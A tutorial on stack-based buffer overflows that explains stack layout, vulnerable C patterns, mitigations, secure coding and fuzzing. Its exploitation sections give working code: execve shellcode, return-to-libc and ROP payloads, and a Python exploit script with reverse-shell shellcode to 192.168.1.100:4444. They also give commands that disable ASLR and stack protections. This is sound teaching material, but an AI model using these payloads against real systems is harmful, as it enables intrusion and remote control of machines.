Stack-Based Buffer Overflows
Understanding stack-based buffer overflows: how they work, exploitation techniques, and defensive measures.
Introduction to Stack-Based Buffer Overflows
Stack-based buffer overflows represent one of the most fundamental and historically significant classes of software vulnerabilities. Despite being well-understood for decades, they continue to appear in modern software due to the prevalence of memory-unsafe languages like C and C++. This comprehensive guide explores the mechanics, exploitation techniques, and defensive measures related to stack-based buffer overflows.
Understanding the Stack
Stack Fundamentals
The stack is a region of memory used for:
- Local variables: Function-scoped variables
- Function parameters: Arguments passed to functions
- Return addresses: Where to continue execution after function calls
- Saved registers: Preserved CPU state
Stack Layout (x86)
The stack grows downward (toward lower memory addresses):
Higher Memory Addresses
┌─────────────────────┐
│ Function Args       │ ← [ebp + 8], [ebp + 0xC], etc.
├─────────────────────┤
│ Return Address      │ ← [ebp + 4]
├─────────────────────┤
│ Saved EBP           │ ← [ebp] (frame pointer)
├─────────────────────┤
│ Local Variable 1    │ ← [ebp - 4]
├─────────────────────┤
│ Local Variable 2    │ ← [ebp - 8]
├─────────────────────┤
│ Buffer              │ ← [ebp - 0x108] (vulnerable buffer)
└─────────────────────┘
Lower Memory Addresses
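The offsets in the diagram translate directly into the distance between the first byte of the buffer and the saved return address. A minimal sketch of that arithmetic, assuming the 32-bit layout shown above (the constant and function names are illustrative and not part of any tool):

```python
# Offsets relative to EBP, taken from the layout diagram (32-bit x86).
BUFFER_OFFSET = -0x108      # buffer starts at [ebp - 0x108]
SAVED_EBP_OFFSET = 0        # saved frame pointer at [ebp]
RETURN_ADDR_OFFSET = 4      # return address at [ebp + 4]


def distance_from_buffer(target_offset, buffer_offset=BUFFER_OFFSET):
    """Number of bytes between the start of the buffer and a frame slot."""
    return target_offset - buffer_offset


bytes_to_saved_ebp = distance_from_buffer(SAVED_EBP_OFFSET)
bytes_to_return_addr = distance_from_buffer(RETURN_ADDR_OFFSET)
print(bytes_to_saved_ebp, bytes_to_return_addr)  # 264 268
```

Any write that runs more than 264 bytes past the start of the buffer reaches the saved frame pointer, and bytes 268 to 271 land on the return address.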
Vulnerable Code Patterns
Classic Example
#include <stdio.h>
#include <string.h>
void vulnerable_function(char* input) {
    char buffer[256]; // Fixed-size buffer
    strcpy(buffer, input); // No bounds checking!
    printf("You entered: %s\n", buffer);
}
int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}
Dangerous Functions
Common functions that can cause buffer overflows:
| Function | Risk | Safer Alternative |
|---|---|---|
| strcpy() | No bounds checking | strlcpy(), or strncpy() plus explicit NUL termination |
| strcat() | No bounds checking | strlcat(), or strncat() with the remaining space as the limit |
| sprintf() | No bounds checking | snprintf() |
| gets() | Cannot check bounds; removed in C11 | fgets() |
| scanf("%s") | No bounds checking | scanf("%255s"), with a field width one less than the buffer size |
Buffer Overflow Mechanics
Normal Function Execution
void function(char* input) {
    char buffer[8]; // 8-byte buffer
    strcpy(buffer, input);
}
// Normal input: "HELLO"
Memory Layout:
[buffer: "HELLO\x00\x00\x00"] [saved ebp] [return addr] [args...]
Buffer Overflow Condition
// Overflow input: "AAAAAAAABBBBCCCCDDDD"
Memory Layout:
[buffer: "AAAAAAAA"] [saved ebp: "BBBB"] [return addr: "CCCC"] [args: "DDDD"]
                                               ↑
                                  Overwritten return address!
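The two layouts can be reproduced with a small model of the frame. This is only a simulation in Python, not real process memory: the saved EBP, return address, and argument values are made up, and `unchecked_copy` is a hypothetical stand-in for `strcpy`.

```python
import struct


def make_frame():
    """Model frame: 8-byte buffer, saved EBP, return address, one argument."""
    frame = bytearray(8)                      # char buffer[8]
    frame += struct.pack("<I", 0xBFFFF6A8)    # saved EBP (made-up value)
    frame += struct.pack("<I", 0x08048456)    # return address (made-up value)
    frame += struct.pack("<I", 0xBFFFF8C0)    # argument (made-up value)
    return frame


def unchecked_copy(frame, data):
    """Mimic strcpy: copy data plus a NUL terminator, ignoring the buffer size."""
    data = data + b"\x00"
    frame[0:len(data)] = data
    return frame


def return_address(frame):
    """Read the 32-bit little-endian value stored in the return-address slot."""
    return struct.unpack_from("<I", frame, 12)[0]


normal = unchecked_copy(make_frame(), b"HELLO")
smashed = unchecked_copy(make_frame(), b"AAAAAAAABBBBCCCCDDDD")
print(hex(return_address(normal)))    # 0x8048456 (untouched)
print(hex(return_address(smashed)))   # 0x43434343 ("CCCC")
```

The short input stays inside the buffer, while the 20-byte input replaces the saved EBP with "BBBB" and the return address with "CCCC".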
Assembly Analysis
Let's examine the assembly code for our vulnerable function:
vulnerable_function:
    push ebp                ; Save caller's frame pointer
    mov  ebp, esp           ; Set up new frame
    sub  esp, 0x118         ; Reserve space: 256-byte buffer, locals, outgoing arguments
    mov  eax, [ebp+8]       ; Load the input pointer (first parameter)
    mov  [esp+4], eax       ; strcpy argument 2: source
    lea  eax, [ebp-0x108]   ; Compute buffer address
    mov  [esp], eax         ; strcpy argument 1: destination
    call strcpy             ; Vulnerable call: copies until NUL, whatever the buffer size
    mov  esp, ebp           ; Restore stack pointer
    pop  ebp                ; Restore frame pointer (possibly overwritten)
    ret                     ; Return (potentially to attacker-controlled address)
Exploitation Techniques
Control Flow Hijacking
The primary goal is to overwrite the return address:
Step 1: Find the Offset
# Confirm the offset with a marker: 268 filler bytes followed by "BCDE"
python -c "print('A' * 268 + 'BCDE')" > payload.txt
# Run under debugger
gdb ./vulnerable
(gdb) run $(cat payload.txt)
# After the crash, check the EIP value
(gdb) info registers eip
eip            0x45444342    0x45444342    # "BCDE" in little-endian
# The return address sits 268 bytes past the start of the buffer
Step 2: Control Return Address
# Exploit payload structure (bytes literals behave the same on Python 2 and 3)
payload = b"A" * 268 # Padding to reach return address
payload += b"\xef\xbe\xad\xde" # New return address (0xdeadbeef, little-endian)
# When the function returns, the program jumps to 0xdeadbeef
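The byte order used for the return address, and the "BCDE" value seen in EIP, both follow from x86 being little-endian. A short sketch using Python's standard `struct` module (the helper names are illustrative):

```python
import struct


def pack_addr(addr):
    """Encode a 32-bit address the way x86 stores it in memory (little-endian)."""
    return struct.pack("<I", addr)


def unpack_addr(raw):
    """Decode 4 bytes read from memory back into a 32-bit integer."""
    return struct.unpack("<I", raw)[0]


print(pack_addr(0xdeadbeef))        # b'\xef\xbe\xad\xde'
print(hex(unpack_addr(b"BCDE")))    # 0x45444342
```

The least significant byte comes first in memory, which is why the address bytes in a payload appear reversed compared with how the address is written.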
Shellcode Injection
Inject and execute arbitrary code:
Simple Shellcode (Linux x86)
# execve("/bin//sh", ["/bin//sh", NULL], envp) shellcode; EDX (envp) is not set by this code
shellcode = (
"\x31\xc0" # xor eax, eax
"\x50" # push eax
"\x68\x2f\x2f\x73\x68" # push 0x68732f2f ("//sh")
"\x68\x2f\x62\x69\x6e" # push 0x6e69622f ("/bin")
"\x89\xe3" # mov ebx, esp
"\x50" # push eax
"\x53" # push ebx
"\x89\xe1" # mov ecx, esp
"\xb0\x0b" # mov al, 0xb (sys_execve)
"\xcd\x80" # int 0x80
)
# Complete exploit
nop_sled = "\x90" * 100 # NOP sled for reliability
padding = "A" * (268 - len(nop_sled) - len(shellcode))
return_addr = "\x10\xf0\xff\xbf" # Address pointing into NOP sled
exploit = nop_sled + shellcode + padding + return_addr
Return-to-libc Attack
When the stack is non-executable, return to existing functions:
# Find function addresses
objdump -T /lib/libc.so.6 | grep system
objdump -T /lib/libc.so.6 | grep exit
# Find string "/bin/sh"
strings -a -t x /lib/libc.so.6 | grep "/bin/sh"
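# Exploit payload: padding, then system() as the new return address,
# exit() as the address system() returns to, and "/bin/sh" as system()'s argument
padding = "A" * 268
system_addr = "\x60\xb7\xe4\xb7" # Address of system()
exit_addr = "\x00\x96\xe4\xb7" # Address of exit() (illustrative; its 0x00 byte would end a strcpy() copy early)
binsh_addr = "\x0b\x8f\xf8\xb7" # Address of "/bin/sh"
exploit = padding + system_addr + exit_addr + binsh_addr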
Exploitation Tools and Techniques
Pattern Generation
# Using Metasploit pattern tools
./pattern_create.rb -l 300
# GDB PEDA
gdb-peda$ pattern create 300
gdb-peda$ pattern offset 0x41384141
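# Python script (Metasploit-style pattern: Aa0Aa1Aa2...)
import itertools
import string
def create_pattern(length):
    # Every upper/lower/digit triple is distinct, so each 4-byte window is unique;
    # a plain repeating A-Z run repeats every 26 bytes and gives ambiguous offsets
    triples = itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    return "".join("".join(t) for t in triples)[:length]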
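Looking up an offset is the inverse of generating the pattern: take the value found in the register, convert it back to its in-memory byte order, and search for it. A minimal sketch, assuming a Metasploit-style `Aa0Aa1...` pattern; the function names are hypothetical, and the output is not guaranteed to match any particular tool's pattern.

```python
import itertools
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3   # 20280 characters before the pattern repeats


def cyclic_pattern(length):
    """Build an Aa0Aa1Aa2... pattern of the requested length, as bytes."""
    if not 0 <= length <= MAX_PATTERN:
        raise ValueError("length must be between 0 and %d" % MAX_PATTERN)
    triples = itertools.product(string.ascii_uppercase,
                                string.ascii_lowercase,
                                string.digits)
    text = "".join(u + l + d for u, l, d in triples)
    return text[:length].encode("ascii")


def pattern_offset(register_value, length=MAX_PATTERN):
    """Offset of the 4 bytes that ended up in a 32-bit register, or -1."""
    needle = struct.pack("<I", register_value)   # back to in-memory byte order
    return cyclic_pattern(length).find(needle)


pattern = cyclic_pattern(300)
# Pretend the 4 bytes at offset 268 were loaded into EIP by the crash.
crashed_eip = struct.unpack("<I", pattern[268:272])[0]
print(pattern[:12], pattern_offset(crashed_eip))
```

Because every 4-byte window of this pattern is unique, the lookup returns a single offset.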
Address Discovery
# Find function addresses in GDB
(gdb) print system
(gdb) print exit
(gdb) find 0xb7e00000, 0xb7f50000, "/bin/sh"
# Using ldd to find library base
ldd ./vulnerable
# Environment variable method: run with an emptied environment so stack addresses stay the same between runs
env - PWD=$PWD ./vulnerable $(python exploit.py)
Reliable Exploitation
#!/usr/bin/env python
# Written for Python 2, where str is a byte string
import struct
import subprocess
def exploit():
    # Shellcode (reverse shell to 192.168.1.100:4444)
    # Caveat: the port push ("\x68\x02\x00\x11\x5c") contains a NUL byte, which
    # cannot be passed in argv and would end the strcpy() copy early
    shellcode = (
        "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
        "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
        "\xa8\x01\x64\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50"
        "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73"
        "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0"
        "\x0b\xcd\x80"
    )
    # Build exploit
    buffer_size = 268  # Offset from buffer start to the saved return address
    nop_sled = "\x90" * 100
    # Calculate padding
    payload_size = len(nop_sled) + len(shellcode)
    padding = "A" * (buffer_size - payload_size)
    # Return address (stack address + offset to NOP sled)
    ret_addr = struct.pack("<I", 0xbffff000 + 200)
    payload = nop_sled + shellcode + padding + ret_addr
    # Execute
    subprocess.call(["./vulnerable", payload])
if __name__ == "__main__":
    exploit()
Defense Mechanisms
Stack Canaries
Compiler-inserted guards to detect stack corruption:
# Compile with stack protection
gcc -fstack-protector-all vulnerable.c -o vulnerable
# Generated assembly includes canary checks
function_start:
mov rax, QWORD PTR fs:0x28 ; Load canary
mov QWORD PTR [rbp-0x8], rax ; Store on stack
; ... function body ...
mov rax, QWORD PTR [rbp-0x8] ; Load stored canary
xor rax, QWORD PTR fs:0x28 ; Compare with original
je .L2 ; Jump if equal
call __stack_chk_fail ; Abort if mismatch
.L2:
leave
ret
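The check performed by the assembly above can be modelled in a few lines. This is a toy simulation in Python, not how the compiler implements it: the `Frame` class, the 16-byte buffer, and the return address value are assumptions made for illustration, and the leading zero byte in the canary mirrors common Linux behavior.

```python
import os
import struct

BUF_SIZE = 16  # hypothetical buffer size for this model


def new_canary():
    """Random 8-byte canary whose first byte is 0, as is common on Linux."""
    return b"\x00" + os.urandom(7)


class Frame:
    """Toy frame: [buffer][canary][saved rbp][return address], low to high."""

    def __init__(self, canary):
        self.reference = canary   # stands in for the value at fs:0x28
        self.memory = (bytearray(BUF_SIZE) + canary + bytes(8)
                       + struct.pack("<Q", 0x401136))

    def write(self, data):
        """Unchecked copy into the buffer; may run past BUF_SIZE."""
        self.memory[0:len(data)] = data

    def epilogue(self):
        """Compare the stored canary with the reference before 'returning'."""
        stored = bytes(self.memory[BUF_SIZE:BUF_SIZE + 8])
        if stored != self.reference:
            raise RuntimeError("*** stack smashing detected ***")
        return struct.unpack_from("<Q", self.memory, BUF_SIZE + 16)[0]


ok = Frame(new_canary())
ok.write(b"A" * BUF_SIZE)          # fills the buffer exactly
print(hex(ok.epilogue()))          # 0x401136

bad = Frame(new_canary())
bad.write(b"A" * 40)               # runs over canary, saved rbp, return address
try:
    bad.epilogue()
except RuntimeError as err:
    print(err)
```

A linear overflow has to cross the canary before it reaches the return address, so the corruption is caught before `ret` executes.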
Non-Executable Stack (NX/DEP)
Mark stack pages as non-executable:
# Compile with NX protection
gcc -Wl,-z,noexecstack vulnerable.c -o vulnerable
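# Check the stack segment flags (RW = non-executable, RWE = executable)
readelf -lW vulnerable | grep GNU_STACK
# Query or change the executable-stack flag stored in the ELF header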
execstack -q vulnerable # Query
execstack -s vulnerable # Set executable (disable protection)
execstack -c vulnerable # Clear executable (enable protection)
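When auditing many binaries, the GNU_STACK check can be scripted. The sketch below only parses a line of text; it assumes the single-line program header format that `readelf -lW` prints, and the function name and sample lines are illustrative.

```python
def stack_is_executable(program_header_line):
    """Return True if a GNU_STACK line from `readelf -lW` carries the E flag."""
    fields = program_header_line.split()
    if not fields or fields[0] != "GNU_STACK":
        raise ValueError("not a GNU_STACK program header line")
    # Columns: type, offset, vaddr, paddr, filesz, memsz, flags..., align
    flags = "".join(fields[6:-1])
    return "E" in flags


# Sample lines in the assumed format (values are illustrative).
nx_line = ("  GNU_STACK      0x000000 0x0000000000000000 "
           "0x0000000000000000 0x000000 0x000000 RW  0x10")
exec_line = ("  GNU_STACK      0x000000 0x0000000000000000 "
             "0x0000000000000000 0x000000 0x000000 RWE 0x10")

print(stack_is_executable(nx_line))    # False
print(stack_is_executable(exec_line))  # True
```

Only the flags column is inspected, so hexadecimal digits in the address columns cannot be mistaken for the E flag.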
Address Space Layout Randomization (ASLR)
# System-wide ASLR control
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space # Conservative
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space # Full
# Per-process ASLR
setarch x86_64 -R ./vulnerable # Disable for this execution
# Check randomization
ldd ./vulnerable # Run multiple times to see address changes
Advanced Exploitation Techniques
Return-Oriented Programming (ROP)
Chain existing code snippets (gadgets) to bypass NX:
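# Find ROP gadgets
ROPgadget --binary ./vulnerable
# Example ROP chain (gadget addresses are illustrative)
import struct
gadget1 = 0x08048384 # pop eax; ret
gadget2 = 0x08048392 # pop ebx; ret
gadget3 = 0x080483a0 # int 0x80; ret
binsh_addr = 0xb7f88f0b # Address of "/bin/sh", as an integer for struct.pack
padding = b"A" * 268
# Partial chain for execve("/bin/sh", NULL, NULL): it sets eax and ebx only;
# a complete chain also needs gadgets that zero ecx and edx
rop_chain = [
    gadget1, # pop eax; ret
    0x0b, # sys_execve
    gadget2, # pop ebx; ret
    binsh_addr, # "/bin/sh"
    gadget3, # int 0x80; ret
]
exploit = padding + b"".join(struct.pack("<I", addr) for addr in rop_chain)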
Bypassing Stack Canaries
- Information leak: Read canary value before overwriting
- Brute force: Guess canary byte by byte (forking servers)
- Targeted overwrite: Corrupt local variables or pointers stored below the canary, leaving the canary itself intact
- Exception handler: Overwrite SEH records on Windows
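The byte-by-byte item in the list above relies on forked children inheriting the parent's canary, which lets each byte be confirmed separately. The simulation below runs against a made-up oracle rather than a real server, to show why the cost grows as 256 × n guesses instead of 256^n; all names are hypothetical.

```python
import os


def make_oracle(secret):
    """Stand-in for a forking server: True means the child did not crash,
    i.e. every canary byte overwritten so far matched the real value."""
    def survives(guess_prefix):
        return secret[:len(guess_prefix)] == guess_prefix
    return survives


def recover_canary(survives, size=8):
    """Confirm one byte at a time, keeping each byte that survives."""
    known = b""
    attempts = 0
    for _ in range(size):
        for candidate in range(256):
            attempts += 1
            if survives(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            raise RuntimeError("no candidate byte survived")
    return known, attempts


secret = b"\x00" + os.urandom(7)
recovered, attempts = recover_canary(make_oracle(secret))
print(recovered == secret, attempts)   # attempts is at most 8 * 256 = 2048
```

The same arithmetic shows the defense: if each new process gets a fresh canary (for example by re-executing instead of only forking), a confirmed byte says nothing about the next attempt.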
ASLR Bypass Techniques
- Information disclosure: Leak addresses from memory
- Partial overwrite: Modify only lower address bytes
- Return-to-PLT: Use procedure linkage table addresses
- JIT spray: Control JIT compiler output
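Information disclosure works because ASLR shifts a whole library by one random base while the distances between symbols inside it stay fixed. A minimal sketch of that arithmetic follows; the symbol offsets are invented for illustration, and real values depend on the exact library build.

```python
# Hypothetical symbol offsets inside a shared library (not from a real build).
SYMBOL_OFFSETS = {"puts": 0x067360, "system": 0x03ADA0, "exit": 0x02E9D0}


def rebase(leaked_addr, leaked_symbol, offsets=SYMBOL_OFFSETS):
    """Derive the library base from one leaked address, then every other address."""
    base = leaked_addr - offsets[leaked_symbol]
    if base & 0xFFF:
        # Mappings are page-aligned, so the low 12 bits of the base must be zero.
        raise ValueError("base is not page-aligned; wrong symbol or library?")
    return base, {name: base + off for name, off in offsets.items()}


base, addrs = rebase(0xB7E00000 + 0x067360, "puts")
print(hex(base), hex(addrs["system"]))   # 0xb7e00000 0xb7e3ada0
```

The page-alignment check also explains partial overwrites: the low 12 bits of an address are not randomized, so changing only the lowest bytes of a pointer keeps it inside the same mapping.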
Secure Coding Practices
Safe String Functions
// Instead of strcpy
char dest[256];
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0'; // strncpy does not terminate on truncation
// Better: use strlcpy if available (BSDs, macOS, glibc 2.38 and later)
strlcpy(dest, src, sizeof(dest));
// On older Linux systems strlcpy comes from libbsd (link with -lbsd)
#include <bsd/string.h> // BSD string functions
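The difference between the two functions is easiest to see on a source string that does not fit. The models below imitate the documented C semantics in Python for illustration only; they are not bindings to the real functions, and 0xAA marks bytes the call never wrote.

```python
def strncpy_model(dest_size, src, n):
    """Model of strncpy(dest, src, n): copies at most n bytes, pads with NULs,
    and adds no terminator when len(src) >= n. Assumes n <= dest_size."""
    assert n <= dest_size
    dest = bytearray(b"\xAA" * dest_size)
    chunk = src[:n]
    dest[:len(chunk)] = chunk
    dest[len(chunk):n] = b"\x00" * (n - len(chunk))
    return bytes(dest)


def strlcpy_model(dest_size, src):
    """Model of strlcpy(dest, src, size): always terminates when size > 0 and
    returns len(src), so a result >= size signals truncation."""
    dest = bytearray(b"\xAA" * dest_size)
    if dest_size > 0:
        chunk = src[:dest_size - 1]
        dest[:len(chunk)] = chunk
        dest[len(chunk)] = 0
    return bytes(dest), len(src)


print(strncpy_model(8, b"ABCDEFGHIJ", 8))   # b'ABCDEFGH' (no terminator)
print(strlcpy_model(8, b"ABCDEFGHIJ"))      # (b'ABCDEFG\x00', 10)
```

The first result has no NUL inside the buffer, which is why the strncpy idiom copies `sizeof(dest) - 1` bytes and writes the terminator by hand.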
Input Validation
#include <string.h>
int safe_copy(char* dest, size_t dest_size, const char* src) {
    if (!dest || !src || dest_size == 0) {
        return -1; // Invalid parameters
    }
    size_t src_len = strlen(src);
    if (src_len >= dest_size) {
        return -1; // Source too large (no room for the terminator)
    }
    strcpy(dest, src); // Now safe: length was checked above
    return 0;
}
Compiler Security Features
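# Recommended compilation flags
#   -fstack-protector-strong     Stack canaries
#   -O2 -D_FORTIFY_SOURCE=2      Runtime checks (require optimization to be enabled)
#   -Wformat -Wformat-security   Format string warnings
#   -fPIE -pie                   Position independent executable
#   -Wl,-z,relro                 Read-only relocations
#   -Wl,-z,now                   Immediate binding
#   -Wl,-z,noexecstack           Non-executable stack
gcc -O2 -fstack-protector-strong \
    -D_FORTIFY_SOURCE=2 \
    -Wformat -Wformat-security \
    -fPIE -pie \
    -Wl,-z,relro \
    -Wl,-z,now \
    -Wl,-z,noexecstack \
    program.c -o program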
Detection and Analysis
Static Analysis
# Flawfinder - scan for vulnerable functions
flawfinder vulnerable.c
# Cppcheck - static analysis
cppcheck --enable=all vulnerable.c
# Clang static analyzer
clang --analyze vulnerable.c
Dynamic Analysis
# Valgrind memory error detection (Memcheck focuses on heap memory and can miss overflows of stack arrays)
valgrind --tool=memcheck ./vulnerable input
# AddressSanitizer
gcc -fsanitize=address -g vulnerable.c -o vulnerable
./vulnerable input
# GDB with plugins
gdb-peda ./vulnerable
gdb-gef ./vulnerable
Fuzzing
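# AFL++ fuzzing
afl-gcc vulnerable.c -o vulnerable-afl
mkdir inputs outputs
echo "test" > inputs/seed
# @@ is replaced by the path of each test-case file, so the target must read its input from that file
afl-fuzz -i inputs -o outputs ./vulnerable-afl @@
# LibFuzzer (the source must define LLVMFuzzerTestOneInput and must not define main)
clang -fsanitize=fuzzer,address vulnerable.c -o vulnerable-fuzz
./vulnerable-fuzz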
Real-World Examples
Historical Vulnerabilities
- Morris Worm (1988): Exploited fingerd buffer overflow
- Code Red (2001): IIS buffer overflow in indexing service
- Slammer (2003): SQL Server buffer overflow
- Conficker (2008): Windows Server Service buffer overflow
Modern Mitigations in Practice
Despite decades of awareness and widely deployed mitigations, buffer overflows still occur, most often in:
- Legacy code: Old software with minimal security features
- Embedded systems: Resource constraints limit protections
- Kernel code: Lower-level code with fewer protections
- Custom protocols: Network parsing code vulnerabilities
Hands-On Lab Exercise
Vulnerable Program
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void secret_function() {
    printf("Congratulations! You've gained control!\n");
    system("/bin/sh");
}
void vulnerable_function(char* input) {
    char buffer[64];
    printf("Buffer is at: %p\n", (void *)buffer);
    strcpy(buffer, input);
    printf("Input copied: %s\n", buffer);
}
int main(int argc, char* argv[]) {
    printf("Secret function is at: %p\n", (void *)secret_function);
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    printf("Program completed normally.\n");
    return 0;
}
Lab Tasks
- Compile without protections: gcc -fno-stack-protector -z execstack -no-pie lab.c -o lab
- Find the buffer overflow: Identify vulnerable function
- Calculate offset: Determine bytes needed to overwrite return address
- Redirect execution: Jump to secret_function
- Enable protections: Recompile with security features and observe differences
Conclusion
Stack-based buffer overflows remain a critical vulnerability class that every security professional must understand. While modern defense mechanisms have significantly raised the bar for exploitation, they have not eliminated the threat entirely.
Key takeaways from this comprehensive analysis:
- Understanding is crucial: Knowing how attacks work enables better defense
- Defense in depth: Multiple protection layers are essential
- Secure coding practices: Prevention is better than mitigation
- Continuous vigilance: Security requires ongoing attention and updates
- Evolution continues: Both attack and defense techniques constantly evolve
As software systems become more complex, the fundamental principles of memory safety become even more important. Whether you're a developer writing secure code, a security analyst hunting for vulnerabilities, or a system administrator implementing defenses, understanding buffer overflows provides essential knowledge for building and maintaining secure systems.
The techniques covered in this guide provide a foundation for understanding both historical and modern exploitation methods, as well as the defensive measures that have evolved to counter them. Remember that with great knowledge comes great responsibility: use this information ethically and only for legitimate security research and defense.